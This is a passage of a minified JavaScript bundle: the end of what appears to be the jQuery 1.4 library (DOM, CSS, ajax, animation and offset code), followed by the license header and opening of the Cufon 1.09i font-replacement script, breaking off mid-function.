u.appendChild(u.ownerDocument.createElement("tbody")):u}var e,j,i=a[0],o=[],k;if(!c.support.checkClone&&arguments.length===3&&typeof i==="string"&&ua.test(i))return this.each(function(){c(this).domManip(a,b,d,true)});if(c.isFunction(i))return this.each(function(u){var z=c(this);a[0]=i.call(this,u,b?z.html():w);z.domManip(a,b,d)});if(this[0]){e=i&&i.parentNode;e=c.support.parentNode&&e&&e.nodeType===11&&e.childNodes.length===this.length?{fragment:e}:sa(a,this,o);k=e.fragment;if(j=k.childNodes.length===
1?(k=k.firstChild):k.firstChild){b=b&&c.nodeName(j,"tr");for(var n=0,r=this.length;n<r;n++)d.call(b?f(this[n],j):this[n],n>0||e.cacheable||this.length>1?k.cloneNode(true):k)}o.length&&c.each(o,Qa)}return this}});c.fragments={};c.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){c.fn[a]=function(d){var f=[];d=c(d);var e=this.length===1&&this[0].parentNode;if(e&&e.nodeType===11&&e.childNodes.length===1&&d.length===1){d[b](this[0]);
return this}else{e=0;for(var j=d.length;e<j;e++){var i=(e>0?this.clone(true):this).get();c.fn[b].apply(c(d[e]),i);f=f.concat(i)}return this.pushStack(f,a,d.selector)}}});c.extend({clean:function(a,b,d,f){b=b||s;if(typeof b.createElement==="undefined")b=b.ownerDocument||b[0]&&b[0].ownerDocument||s;for(var e=[],j=0,i;(i=a[j])!=null;j++){if(typeof i==="number")i+="";if(i){if(typeof i==="string"&&!jb.test(i))i=b.createTextNode(i);else if(typeof i==="string"){i=i.replace(Ka,Ma);var o=(La.exec(i)||["",
""])[1].toLowerCase(),k=F[o]||F._default,n=k[0],r=b.createElement("div");for(r.innerHTML=k[1]+i+k[2];n--;)r=r.lastChild;if(!c.support.tbody){n=ib.test(i);o=o==="table"&&!n?r.firstChild&&r.firstChild.childNodes:k[1]==="<table>"&&!n?r.childNodes:[];for(k=o.length-1;k>=0;--k)c.nodeName(o[k],"tbody")&&!o[k].childNodes.length&&o[k].parentNode.removeChild(o[k])}!c.support.leadingWhitespace&&V.test(i)&&r.insertBefore(b.createTextNode(V.exec(i)[0]),r.firstChild);i=r.childNodes}if(i.nodeType)e.push(i);else e=
c.merge(e,i)}}if(d)for(j=0;e[j];j++)if(f&&c.nodeName(e[j],"script")&&(!e[j].type||e[j].type.toLowerCase()==="text/javascript"))f.push(e[j].parentNode?e[j].parentNode.removeChild(e[j]):e[j]);else{e[j].nodeType===1&&e.splice.apply(e,[j+1,0].concat(c.makeArray(e[j].getElementsByTagName("script"))));d.appendChild(e[j])}return e},cleanData:function(a){for(var b,d,f=c.cache,e=c.event.special,j=c.support.deleteExpando,i=0,o;(o=a[i])!=null;i++)if(d=o[c.expando]){b=f[d];if(b.events)for(var k in b.events)e[k]?
c.event.remove(o,k):Ca(o,k,b.handle);if(j)delete o[c.expando];else o.removeAttribute&&o.removeAttribute(c.expando);delete f[d]}}});var kb=/z-?index|font-?weight|opacity|zoom|line-?height/i,Na=/alpha\([^)]*\)/,Oa=/opacity=([^)]*)/,ha=/float/i,ia=/-([a-z])/ig,lb=/([A-Z])/g,mb=/^-?\d+(?:px)?$/i,nb=/^-?\d/,ob={position:"absolute",visibility:"hidden",display:"block"},pb=["Left","Right"],qb=["Top","Bottom"],rb=s.defaultView&&s.defaultView.getComputedStyle,Pa=c.support.cssFloat?"cssFloat":"styleFloat",ja=
function(a,b){return b.toUpperCase()};c.fn.css=function(a,b){return X(this,a,b,true,function(d,f,e){if(e===w)return c.curCSS(d,f);if(typeof e==="number"&&!kb.test(f))e+="px";c.style(d,f,e)})};c.extend({style:function(a,b,d){if(!a||a.nodeType===3||a.nodeType===8)return w;if((b==="width"||b==="height")&&parseFloat(d)<0)d=w;var f=a.style||a,e=d!==w;if(!c.support.opacity&&b==="opacity"){if(e){f.zoom=1;b=parseInt(d,10)+""==="NaN"?"":"alpha(opacity="+d*100+")";a=f.filter||c.curCSS(a,"filter")||"";f.filter=
Na.test(a)?a.replace(Na,b):b}return f.filter&&f.filter.indexOf("opacity=")>=0?parseFloat(Oa.exec(f.filter)[1])/100+"":""}if(ha.test(b))b=Pa;b=b.replace(ia,ja);if(e)f[b]=d;return f[b]},css:function(a,b,d,f){if(b==="width"||b==="height"){var e,j=b==="width"?pb:qb;function i(){e=b==="width"?a.offsetWidth:a.offsetHeight;f!=="border"&&c.each(j,function(){f||(e-=parseFloat(c.curCSS(a,"padding"+this,true))||0);if(f==="margin")e+=parseFloat(c.curCSS(a,"margin"+this,true))||0;else e-=parseFloat(c.curCSS(a,
"border"+this+"Width",true))||0})}a.offsetWidth!==0?i():c.swap(a,ob,i);return Math.max(0,Math.round(e))}return c.curCSS(a,b,d)},curCSS:function(a,b,d){var f,e=a.style;if(!c.support.opacity&&b==="opacity"&&a.currentStyle){f=Oa.test(a.currentStyle.filter||"")?parseFloat(RegExp.$1)/100+"":"";return f===""?"1":f}if(ha.test(b))b=Pa;if(!d&&e&&e[b])f=e[b];else if(rb){if(ha.test(b))b="float";b=b.replace(lb,"-$1").toLowerCase();e=a.ownerDocument.defaultView;if(!e)return null;if(a=e.getComputedStyle(a,null))f=
a.getPropertyValue(b);if(b==="opacity"&&f==="")f="1"}else if(a.currentStyle){d=b.replace(ia,ja);f=a.currentStyle[b]||a.currentStyle[d];if(!mb.test(f)&&nb.test(f)){b=e.left;var j=a.runtimeStyle.left;a.runtimeStyle.left=a.currentStyle.left;e.left=d==="fontSize"?"1em":f||0;f=e.pixelLeft+"px";e.left=b;a.runtimeStyle.left=j}}return f},swap:function(a,b,d){var f={};for(var e in b){f[e]=a.style[e];a.style[e]=b[e]}d.call(a);for(e in b)a.style[e]=f[e]}});if(c.expr&&c.expr.filters){c.expr.filters.hidden=function(a){var b=
a.offsetWidth,d=a.offsetHeight,f=a.nodeName.toLowerCase()==="tr";return b===0&&d===0&&!f?true:b>0&&d>0&&!f?false:c.curCSS(a,"display")==="none"};c.expr.filters.visible=function(a){return!c.expr.filters.hidden(a)}}var sb=J(),tb=/<script(.|\s)*?\/script>/gi,ub=/select|textarea/i,vb=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,N=/=\?(&|$)/,ka=/\?/,wb=/(\?|&)_=.*?(&|$)/,xb=/^(\w+:)?\/\/([^\/?#]+)/,yb=/%20/g,zb=c.fn.load;c.fn.extend({load:function(a,b,d){if(typeof a!==
"string")return zb.call(this,a);else if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var e=a.slice(f,a.length);a=a.slice(0,f)}f="GET";if(b)if(c.isFunction(b)){d=b;b=null}else if(typeof b==="object"){b=c.param(b,c.ajaxSettings.traditional);f="POST"}var j=this;c.ajax({url:a,type:f,dataType:"html",data:b,complete:function(i,o){if(o==="success"||o==="notmodified")j.html(e?c("<div />").append(i.responseText.replace(tb,"")).find(e):i.responseText);d&&j.each(d,[i.responseText,o,i])}});return this},
serialize:function(){return c.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?c.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||ub.test(this.nodeName)||vb.test(this.type))}).map(function(a,b){a=c(this).val();return a==null?null:c.isArray(a)?c.map(a,function(d){return{name:b.name,value:d}}):{name:b.name,value:a}}).get()}});c.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),
function(a,b){c.fn[b]=function(d){return this.bind(b,d)}});c.extend({get:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b=null}return c.ajax({type:"GET",url:a,data:b,success:d,dataType:f})},getScript:function(a,b){return c.get(a,null,b,"script")},getJSON:function(a,b,d){return c.get(a,b,d,"json")},post:function(a,b,d,f){if(c.isFunction(b)){f=f||d;d=b;b={}}return c.ajax({type:"POST",url:a,data:b,success:d,dataType:f})},ajaxSetup:function(a){c.extend(c.ajaxSettings,a)},ajaxSettings:{url:location.href,
global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:A.XMLHttpRequest&&(A.location.protocol!=="file:"||!A.ActiveXObject)?function(){return new A.XMLHttpRequest}:function(){try{return new A.ActiveXObject("Microsoft.XMLHTTP")}catch(a){}},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},etag:{},ajax:function(a){function b(){e.success&&
e.success.call(k,o,i,x);e.global&&f("ajaxSuccess",[x,e])}function d(){e.complete&&e.complete.call(k,x,i);e.global&&f("ajaxComplete",[x,e]);e.global&&!--c.active&&c.event.trigger("ajaxStop")}function f(q,p){(e.context?c(e.context):c.event).trigger(q,p)}var e=c.extend(true,{},c.ajaxSettings,a),j,i,o,k=a&&a.context||e,n=e.type.toUpperCase();if(e.data&&e.processData&&typeof e.data!=="string")e.data=c.param(e.data,e.traditional);if(e.dataType==="jsonp"){if(n==="GET")N.test(e.url)||(e.url+=(ka.test(e.url)?
"&":"?")+(e.jsonp||"callback")+"=?");else if(!e.data||!N.test(e.data))e.data=(e.data?e.data+"&":"")+(e.jsonp||"callback")+"=?";e.dataType="json"}if(e.dataType==="json"&&(e.data&&N.test(e.data)||N.test(e.url))){j=e.jsonpCallback||"jsonp"+sb++;if(e.data)e.data=(e.data+"").replace(N,"="+j+"$1");e.url=e.url.replace(N,"="+j+"$1");e.dataType="script";A[j]=A[j]||function(q){o=q;b();d();A[j]=w;try{delete A[j]}catch(p){}z&&z.removeChild(C)}}if(e.dataType==="script"&&e.cache===null)e.cache=false;if(e.cache===
false&&n==="GET"){var r=J(),u=e.url.replace(wb,"$1_="+r+"$2");e.url=u+(u===e.url?(ka.test(e.url)?"&":"?")+"_="+r:"")}if(e.data&&n==="GET")e.url+=(ka.test(e.url)?"&":"?")+e.data;e.global&&!c.active++&&c.event.trigger("ajaxStart");r=(r=xb.exec(e.url))&&(r[1]&&r[1]!==location.protocol||r[2]!==location.host);if(e.dataType==="script"&&n==="GET"&&r){var z=s.getElementsByTagName("head")[0]||s.documentElement,C=s.createElement("script");C.src=e.url;if(e.scriptCharset)C.charset=e.scriptCharset;if(!j){var B=
false;C.onload=C.onreadystatechange=function(){if(!B&&(!this.readyState||this.readyState==="loaded"||this.readyState==="complete")){B=true;b();d();C.onload=C.onreadystatechange=null;z&&C.parentNode&&z.removeChild(C)}}}z.insertBefore(C,z.firstChild);return w}var E=false,x=e.xhr();if(x){e.username?x.open(n,e.url,e.async,e.username,e.password):x.open(n,e.url,e.async);try{if(e.data||a&&a.contentType)x.setRequestHeader("Content-Type",e.contentType);if(e.ifModified){c.lastModified[e.url]&&x.setRequestHeader("If-Modified-Since",
c.lastModified[e.url]);c.etag[e.url]&&x.setRequestHeader("If-None-Match",c.etag[e.url])}r||x.setRequestHeader("X-Requested-With","XMLHttpRequest");x.setRequestHeader("Accept",e.dataType&&e.accepts[e.dataType]?e.accepts[e.dataType]+", */*":e.accepts._default)}catch(ga){}if(e.beforeSend&&e.beforeSend.call(k,x,e)===false){e.global&&!--c.active&&c.event.trigger("ajaxStop");x.abort();return false}e.global&&f("ajaxSend",[x,e]);var g=x.onreadystatechange=function(q){if(!x||x.readyState===0||q==="abort"){E||
d();E=true;if(x)x.onreadystatechange=c.noop}else if(!E&&x&&(x.readyState===4||q==="timeout")){E=true;x.onreadystatechange=c.noop;i=q==="timeout"?"timeout":!c.httpSuccess(x)?"error":e.ifModified&&c.httpNotModified(x,e.url)?"notmodified":"success";var p;if(i==="success")try{o=c.httpData(x,e.dataType,e)}catch(v){i="parsererror";p=v}if(i==="success"||i==="notmodified")j||b();else c.handleError(e,x,i,p);d();q==="timeout"&&x.abort();if(e.async)x=null}};try{var h=x.abort;x.abort=function(){x&&h.call(x);
g("abort")}}catch(l){}e.async&&e.timeout>0&&setTimeout(function(){x&&!E&&g("timeout")},e.timeout);try{x.send(n==="POST"||n==="PUT"||n==="DELETE"?e.data:null)}catch(m){c.handleError(e,x,null,m);d()}e.async||g();return x}},handleError:function(a,b,d,f){if(a.error)a.error.call(a.context||a,b,d,f);if(a.global)(a.context?c(a.context):c.event).trigger("ajaxError",[b,a,f])},active:0,httpSuccess:function(a){try{return!a.status&&location.protocol==="file:"||a.status>=200&&a.status<300||a.status===304||a.status===
1223||a.status===0}catch(b){}return false},httpNotModified:function(a,b){var d=a.getResponseHeader("Last-Modified"),f=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(f)c.etag[b]=f;return a.status===304||a.status===0},httpData:function(a,b,d){var f=a.getResponseHeader("content-type")||"",e=b==="xml"||!b&&f.indexOf("xml")>=0;a=e?a.responseXML:a.responseText;e&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b===
"json"||!b&&f.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&f.indexOf("javascript")>=0)c.globalEval(a);return a},param:function(a,b){function d(i,o){if(c.isArray(o))c.each(o,function(k,n){b||/\[\]$/.test(i)?f(i,n):d(i+"["+(typeof n==="object"||c.isArray(n)?k:"")+"]",n)});else!b&&o!=null&&typeof o==="object"?c.each(o,function(k,n){d(i+"["+k+"]",n)}):f(i,o)}function f(i,o){o=c.isFunction(o)?o():o;e[e.length]=encodeURIComponent(i)+"="+encodeURIComponent(o)}var e=[];if(b===w)b=c.ajaxSettings.traditional;
if(c.isArray(a)||a.jquery)c.each(a,function(){f(this.name,this.value)});else for(var j in a)d(j,a[j]);return e.join("&").replace(yb,"+")}});var la={},Ab=/toggle|show|hide/,Bb=/^([+-]=)?([\d+-.]+)(.*)$/,W,va=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];c.fn.extend({show:function(a,b){if(a||a===0)return this.animate(K("show",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");
this[a].style.display=d||"";if(c.css(this[a],"display")==="none"){d=this[a].nodeName;var f;if(la[d])f=la[d];else{var e=c("<"+d+" />").appendTo("body");f=e.css("display");if(f==="none")f="block";e.remove();la[d]=f}c.data(this[a],"olddisplay",f)}}a=0;for(b=this.length;a<b;a++)this[a].style.display=c.data(this[a],"olddisplay")||"";return this}},hide:function(a,b){if(a||a===0)return this.animate(K("hide",3),a,b);else{a=0;for(b=this.length;a<b;a++){var d=c.data(this[a],"olddisplay");!d&&d!=="none"&&c.data(this[a],
"olddisplay",c.css(this[a],"display"))}a=0;for(b=this.length;a<b;a++)this[a].style.display="none";return this}},_toggle:c.fn.toggle,toggle:function(a,b){var d=typeof a==="boolean";if(c.isFunction(a)&&c.isFunction(b))this._toggle.apply(this,arguments);else a==null||d?this.each(function(){var f=d?a:c(this).is(":hidden");c(this)[f?"show":"hide"]()}):this.animate(K("toggle",3),a,b);return this},fadeTo:function(a,b,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,d)},
animate:function(a,b,d,f){var e=c.speed(b,d,f);if(c.isEmptyObject(a))return this.each(e.complete);return this[e.queue===false?"each":"queue"](function(){var j=c.extend({},e),i,o=this.nodeType===1&&c(this).is(":hidden"),k=this;for(i in a){var n=i.replace(ia,ja);if(i!==n){a[n]=a[i];delete a[i];i=n}if(a[i]==="hide"&&o||a[i]==="show"&&!o)return j.complete.call(this);if((i==="height"||i==="width")&&this.style){j.display=c.css(this,"display");j.overflow=this.style.overflow}if(c.isArray(a[i])){(j.specialEasing=
j.specialEasing||{})[i]=a[i][1];a[i]=a[i][0]}}if(j.overflow!=null)this.style.overflow="hidden";j.curAnim=c.extend({},a);c.each(a,function(r,u){var z=new c.fx(k,j,r);if(Ab.test(u))z[u==="toggle"?o?"show":"hide":u](a);else{var C=Bb.exec(u),B=z.cur(true)||0;if(C){u=parseFloat(C[2]);var E=C[3]||"px";if(E!=="px"){k.style[r]=(u||1)+E;B=(u||1)/z.cur(true)*B;k.style[r]=B+E}if(C[1])u=(C[1]==="-="?-1:1)*u+B;z.custom(B,u,E)}else z.custom(B,u,"")}});return true})},stop:function(a,b){var d=c.timers;a&&this.queue([]);
this.each(function(){for(var f=d.length-1;f>=0;f--)if(d[f].elem===this){b&&d[f](true);d.splice(f,1)}});b||this.dequeue();return this}});c.each({slideDown:K("show",1),slideUp:K("hide",1),slideToggle:K("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(a,b){c.fn[a]=function(d,f){return this.animate(b,d,f)}});c.extend({speed:function(a,b,d){var f=a&&typeof a==="object"?a:{complete:d||!d&&b||c.isFunction(a)&&a,duration:a,easing:d&&b||b&&!c.isFunction(b)&&b};f.duration=c.fx.off?0:typeof f.duration===
"number"?f.duration:c.fx.speeds[f.duration]||c.fx.speeds._default;f.old=f.complete;f.complete=function(){f.queue!==false&&c(this).dequeue();c.isFunction(f.old)&&f.old.call(this)};return f},easing:{linear:function(a,b,d,f){return d+f*a},swing:function(a,b,d,f){return(-Math.cos(a*Math.PI)/2+0.5)*f+d}},timers:[],fx:function(a,b,d){this.options=b;this.elem=a;this.prop=d;if(!b.orig)b.orig={}}});c.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this);(c.fx.step[this.prop]||
c.fx.step._default)(this);if((this.prop==="height"||this.prop==="width")&&this.elem.style)this.elem.style.display="block"},cur:function(a){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];return(a=parseFloat(c.css(this.elem,this.prop,a)))&&a>-10000?a:parseFloat(c.curCSS(this.elem,this.prop))||0},custom:function(a,b,d){function f(j){return e.step(j)}this.startTime=J();this.start=a;this.end=b;this.unit=d||this.unit||"px";this.now=this.start;
this.pos=this.state=0;var e=this;f.elem=this.elem;if(f()&&c.timers.push(f)&&!W)W=setInterval(c.fx.tick,13)},show:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.show=true;this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur());c(this.elem).show()},hide:function(){this.options.orig[this.prop]=c.style(this.elem,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(a){var b=J(),d=true;if(a||b>=this.options.duration+this.startTime){this.now=
this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;for(var f in this.options.curAnim)if(this.options.curAnim[f]!==true)d=false;if(d){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;a=c.data(this.elem,"olddisplay");this.elem.style.display=a?a:this.options.display;if(c.css(this.elem,"display")==="none")this.elem.style.display="block"}this.options.hide&&c(this.elem).hide();if(this.options.hide||this.options.show)for(var e in this.options.curAnim)c.style(this.elem,
e,this.options.orig[e]);this.options.complete.call(this.elem)}return false}else{e=b-this.startTime;this.state=e/this.options.duration;a=this.options.easing||(c.easing.swing?"swing":"linear");this.pos=c.easing[this.options.specialEasing&&this.options.specialEasing[this.prop]||a](this.state,e,0,1,this.options.duration);this.now=this.start+(this.end-this.start)*this.pos;this.update()}return true}};c.extend(c.fx,{tick:function(){for(var a=c.timers,b=0;b<a.length;b++)a[b]()||a.splice(b--,1);a.length||
c.fx.stop()},stop:function(){clearInterval(W);W=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){c.style(a.elem,"opacity",a.now)},_default:function(a){if(a.elem.style&&a.elem.style[a.prop]!=null)a.elem.style[a.prop]=(a.prop==="width"||a.prop==="height"?Math.max(0,a.now):a.now)+a.unit;else a.elem[a.prop]=a.now}}});if(c.expr&&c.expr.filters)c.expr.filters.animated=function(a){return c.grep(c.timers,function(b){return a===b.elem}).length};c.fn.offset="getBoundingClientRect"in s.documentElement?
function(a){var b=this[0];if(a)return this.each(function(e){c.offset.setOffset(this,a,e)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);var d=b.getBoundingClientRect(),f=b.ownerDocument;b=f.body;f=f.documentElement;return{top:d.top+(self.pageYOffset||c.support.boxModel&&f.scrollTop||b.scrollTop)-(f.clientTop||b.clientTop||0),left:d.left+(self.pageXOffset||c.support.boxModel&&f.scrollLeft||b.scrollLeft)-(f.clientLeft||b.clientLeft||0)}}:function(a){var b=
this[0];if(a)return this.each(function(r){c.offset.setOffset(this,a,r)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return c.offset.bodyOffset(b);c.offset.initialize();var d=b.offsetParent,f=b,e=b.ownerDocument,j,i=e.documentElement,o=e.body;f=(e=e.defaultView)?e.getComputedStyle(b,null):b.currentStyle;for(var k=b.offsetTop,n=b.offsetLeft;(b=b.parentNode)&&b!==o&&b!==i;){if(c.offset.supportsFixedPosition&&f.position==="fixed")break;j=e?e.getComputedStyle(b,null):b.currentStyle;
k-=b.scrollTop;n-=b.scrollLeft;if(b===d){k+=b.offsetTop;n+=b.offsetLeft;if(c.offset.doesNotAddBorder&&!(c.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(b.nodeName))){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=d;d=b.offsetParent}if(c.offset.subtractsBorderForOverflowNotVisible&&j.overflow!=="visible"){k+=parseFloat(j.borderTopWidth)||0;n+=parseFloat(j.borderLeftWidth)||0}f=j}if(f.position==="relative"||f.position==="static"){k+=o.offsetTop;n+=o.offsetLeft}if(c.offset.supportsFixedPosition&&
f.position==="fixed"){k+=Math.max(i.scrollTop,o.scrollTop);n+=Math.max(i.scrollLeft,o.scrollLeft)}return{top:k,left:n}};c.offset={initialize:function(){var a=s.body,b=s.createElement("div"),d,f,e,j=parseFloat(c.curCSS(a,"marginTop",true))||0;c.extend(b.style,{position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"});b.innerHTML="<div style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;'><div></div></div><table style='position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;' cellpadding='0' cellspacing='0'><tr><td></td></tr></table>";
a.insertBefore(b,a.firstChild);d=b.firstChild;f=d.firstChild;e=d.nextSibling.firstChild.firstChild;this.doesNotAddBorder=f.offsetTop!==5;this.doesAddBorderForTableAndCells=e.offsetTop===5;f.style.position="fixed";f.style.top="20px";this.supportsFixedPosition=f.offsetTop===20||f.offsetTop===15;f.style.position=f.style.top="";d.style.overflow="hidden";d.style.position="relative";this.subtractsBorderForOverflowNotVisible=f.offsetTop===-5;this.doesNotIncludeMarginInBodyOffset=a.offsetTop!==j;a.removeChild(b);
c.offset.initialize=c.noop},bodyOffset:function(a){var b=a.offsetTop,d=a.offsetLeft;c.offset.initialize();if(c.offset.doesNotIncludeMarginInBodyOffset){b+=parseFloat(c.curCSS(a,"marginTop",true))||0;d+=parseFloat(c.curCSS(a,"marginLeft",true))||0}return{top:b,left:d}},setOffset:function(a,b,d){if(/static/.test(c.curCSS(a,"position")))a.style.position="relative";var f=c(a),e=f.offset(),j=parseInt(c.curCSS(a,"top",true),10)||0,i=parseInt(c.curCSS(a,"left",true),10)||0;if(c.isFunction(b))b=b.call(a,
d,e);d={top:b.top-e.top+j,left:b.left-e.left+i};"using"in b?b.using.call(a,d):f.css(d)}};c.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),d=this.offset(),f=/^body|html$/i.test(b[0].nodeName)?{top:0,left:0}:b.offset();d.top-=parseFloat(c.curCSS(a,"marginTop",true))||0;d.left-=parseFloat(c.curCSS(a,"marginLeft",true))||0;f.top+=parseFloat(c.curCSS(b[0],"borderTopWidth",true))||0;f.left+=parseFloat(c.curCSS(b[0],"borderLeftWidth",true))||0;return{top:d.top-
f.top,left:d.left-f.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||s.body;a&&!/^body|html$/i.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(f){var e=this[0],j;if(!e)return null;if(f!==w)return this.each(function(){if(j=wa(this))j.scrollTo(!a?f:c(j).scrollLeft(),a?f:c(j).scrollTop());else this[d]=f});else return(j=wa(e))?"pageXOffset"in j?j[a?"pageYOffset":
"pageXOffset"]:c.support.boxModel&&j.document.documentElement[d]||j.document.body[d]:e[d]}});c.each(["Height","Width"],function(a,b){var d=b.toLowerCase();c.fn["inner"+b]=function(){return this[0]?c.css(this[0],d,false,"padding"):null};c.fn["outer"+b]=function(f){return this[0]?c.css(this[0],d,false,f?"margin":"border"):null};c.fn[d]=function(f){var e=this[0];if(!e)return f==null?null:this;if(c.isFunction(f))return this.each(function(j){var i=c(this);i[d](f.call(this,j,i[d]()))});return"scrollTo"in
e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window);

/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return 